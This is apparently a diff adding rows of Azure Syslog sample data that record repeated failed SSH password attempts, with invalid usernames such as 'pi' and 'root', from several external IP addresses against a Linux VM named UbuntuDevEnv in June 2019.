+19005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:26,UbuntuDevEnv,2019-06-26 11:12:26,auth,UbuntuDevEnv,info,Disconnected from 218.3.172.108 port 63148 [preauth],94747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.3.172.1,63148,,
+19006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:26,UbuntuDevEnv,2019-06-26 11:12:26,auth,UbuntuDevEnv,info,Received disconnect from 218.3.172.108 port 63148:11: Bye Bye [preauth],94747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.3.172.1,63148,,
+19007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:35,UbuntuDevEnv,2019-06-26 11:12:35,auth,UbuntuDevEnv,info,Invalid user sunshine from 106.13.142.247 port 32774,94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunshine,106.13.142.2,32774,,
+19008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:35,UbuntuDevEnv,2019-06-26 11:12:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+19009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:35,UbuntuDevEnv,2019-06-26 11:12:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:37,UbuntuDevEnv,2019-06-26 11:12:37,auth,UbuntuDevEnv,info,Failed password for invalid user sunshine from 106.13.142.247 port 32774 ssh2,94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunshine,106.13.142.2,32774,,
+19011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:37,UbuntuDevEnv,2019-06-26 11:12:37,auth,UbuntuDevEnv,info,Disconnected from invalid user sunshine 106.13.142.247 port 32774 [preauth],94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunshine,106.13.142.2,32774,,
+19012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:12:37,UbuntuDevEnv,2019-06-26 11:12:37,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 32774:11: Bye Bye [preauth],94774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,32774,,
+19013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:14,UbuntuDevEnv,2019-06-26 11:13:14,auth,UbuntuDevEnv,info,Invalid user eden from 47.44.115.81 port 49808,94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,47.44.115.8,49808,,
+19014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:14,UbuntuDevEnv,2019-06-26 11:13:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+19015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:14,UbuntuDevEnv,2019-06-26 11:13:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:17,UbuntuDevEnv,2019-06-26 11:13:16,auth,UbuntuDevEnv,info,Failed password for invalid user eden from 47.44.115.81 port 49808 ssh2,94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,47.44.115.8,49808,,
+19017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:17,UbuntuDevEnv,2019-06-26 11:13:17,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 49808:11: Bye Bye [preauth],94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,49808,,
+19018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:13:17,UbuntuDevEnv,2019-06-26 11:13:17,auth,UbuntuDevEnv,info,Disconnected from invalid user eden 47.44.115.81 port 49808 [preauth],94918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,47.44.115.8,49808,,
+19019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:13,UbuntuDevEnv,2019-06-26 11:14:12,auth,UbuntuDevEnv,info,Invalid user admin. from 106.13.142.247 port 45028,95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45028,,
+19020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:13,UbuntuDevEnv,2019-06-26 11:14:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+19021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:13,UbuntuDevEnv,2019-06-26 11:14:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:14,UbuntuDevEnv,2019-06-26 11:14:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin. from 106.13.142.247 port 45028 ssh2,95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45028,,
+19023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:15,UbuntuDevEnv,2019-06-26 11:14:15,auth,UbuntuDevEnv,info,Disconnected from invalid user admin. 106.13.142.247 port 45028 [preauth],95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45028,,
+19024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:14:15,UbuntuDevEnv,2019-06-26 11:14:15,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 45028:11: Bye Bye [preauth],95120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,45028,,
+19025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:22,UbuntuDevEnv,2019-06-26 11:15:21,auth,UbuntuDevEnv,info,Invalid user user from 47.44.115.81 port 38822,95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.44.115.8,38822,,
+19026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:22,UbuntuDevEnv,2019-06-26 11:15:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:22,UbuntuDevEnv,2019-06-26 11:15:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+19028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:24,UbuntuDevEnv,2019-06-26 11:15:23,auth,UbuntuDevEnv,info,Failed password for invalid user user from 47.44.115.81 port 38822 ssh2,95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.44.115.8,38822,,
+19029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:24,UbuntuDevEnv,2019-06-26 11:15:23,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 38822:11: Bye Bye [preauth],95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,38822,,
+19030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:24,UbuntuDevEnv,2019-06-26 11:15:23,auth,UbuntuDevEnv,info,Disconnected from invalid user user 47.44.115.81 port 38822 [preauth],95401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,47.44.115.8,38822,,
+19031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:48,UbuntuDevEnv,2019-06-26 11:15:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+19032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:48,UbuntuDevEnv,2019-06-26 11:15:48,auth,UbuntuDevEnv,info,Invalid user karim from 106.13.142.247 port 57284,95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,karim,106.13.142.2,57284,,
+19033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:48,UbuntuDevEnv,2019-06-26 11:15:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:50,UbuntuDevEnv,2019-06-26 11:15:49,auth,UbuntuDevEnv,info,Failed password for invalid user karim from 106.13.142.247 port 57284 ssh2,95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,karim,106.13.142.2,57284,,
+19035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:51,UbuntuDevEnv,2019-06-26 11:15:50,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 57284:11: Bye Bye [preauth],95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,57284,,
+19036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:15:51,UbuntuDevEnv,2019-06-26 11:15:50,auth,UbuntuDevEnv,info,Disconnected from invalid user karim 106.13.142.247 port 57284 [preauth],95550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,karim,106.13.142.2,57284,,
+19037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:24,UbuntuDevEnv,2019-06-26 11:17:24,auth,UbuntuDevEnv,info,Invalid user mariajose from 47.44.115.81 port 56066,95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,47.44.115.8,56066,,
+19038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:24,UbuntuDevEnv,2019-06-26 11:17:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:24,UbuntuDevEnv,2019-06-26 11:17:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+19040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:27,UbuntuDevEnv,2019-06-26 11:17:27,auth,UbuntuDevEnv,info,Failed password for invalid user mariajose from 47.44.115.81 port 56066 ssh2,95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,47.44.115.8,56066,,
+19041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:27,UbuntuDevEnv,2019-06-26 11:17:27,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 56066:11: Bye Bye [preauth],95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,56066,,
+19042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:17:27,UbuntuDevEnv,2019-06-26 11:17:27,auth,UbuntuDevEnv,info,Disconnected from invalid user mariajose 47.44.115.81 port 56066 [preauth],95896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,47.44.115.8,56066,,
+19043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:19:28,UbuntuDevEnv,2019-06-26 11:19:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81  user=root,96335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,47.44.115.8,,0,
+19044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:19:30,UbuntuDevEnv,2019-06-26 11:19:29,auth,UbuntuDevEnv,info,Failed password for root from 47.44.115.81 port 45086 ssh2,96335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,45086,,
+19045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:19:30,UbuntuDevEnv,2019-06-26 11:19:30,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 45086:11: Bye Bye [preauth],96335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,45086,,
+19046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:19:30,UbuntuDevEnv,2019-06-26 11:19:30,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 47.44.115.81 port 45086 [preauth],96335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,47.44.115.8,45086,,
+19047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,auth,UbuntuDevEnv,info,Invalid user pi from 213.163.174.17 port 46358,96964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46358,,
+19048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,auth,UbuntuDevEnv,info,Invalid user pi from 213.163.174.17 port 46360,96965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46360,,
+19049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=213.163.174.17,96964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,213.163.174.1,,0,
+19050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:37,UbuntuDevEnv,2019-06-26 11:20:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=213.163.174.17,96965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,213.163.174.1,,0,
+19053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:40,UbuntuDevEnv,2019-06-26 11:20:39,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 213.163.174.17 port 46358 ssh2,96964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46358,,
+19054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:40,UbuntuDevEnv,2019-06-26 11:20:39,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 213.163.174.17 port 46360 ssh2,96965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46360,,
+19055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:40,UbuntuDevEnv,2019-06-26 11:20:39,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 213.163.174.17 port 46358 [preauth],96964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46358,,invalid
+19056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:20:40,UbuntuDevEnv,2019-06-26 11:20:39,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 213.163.174.17 port 46360 [preauth],96965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,213.163.174.1,46360,,invalid
+19057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:27,UbuntuDevEnv,2019-06-26 12:21:27,auth,UbuntuDevEnv,info,Invalid user neww from 27.106.45.6 port 60694,110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,neww,27.106.45.6,60694,,
+19058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:27,UbuntuDevEnv,2019-06-26 12:21:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+19059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:27,UbuntuDevEnv,2019-06-26 12:21:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:29,UbuntuDevEnv,2019-06-26 12:21:28,auth,UbuntuDevEnv,info,Failed password for invalid user neww from 27.106.45.6 port 60694 ssh2,110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,neww,27.106.45.6,60694,,
+19061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:29,UbuntuDevEnv,2019-06-26 12:21:29,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 60694:11: Bye Bye [preauth],110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,60694,,
+19062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:21:29,UbuntuDevEnv,2019-06-26 12:21:29,auth,UbuntuDevEnv,info,Disconnected from invalid user neww 27.106.45.6 port 60694 [preauth],110586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,neww,27.106.45.6,60694,,
+19063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:12,UbuntuDevEnv,2019-06-26 12:23:11,auth,UbuntuDevEnv,info,Invalid user bharat from 27.106.45.6 port 40890,110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bharat,27.106.45.6,40890,,
+19064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:23:12,UbuntuDevEnv,2019-06-26 12:23:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,110944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
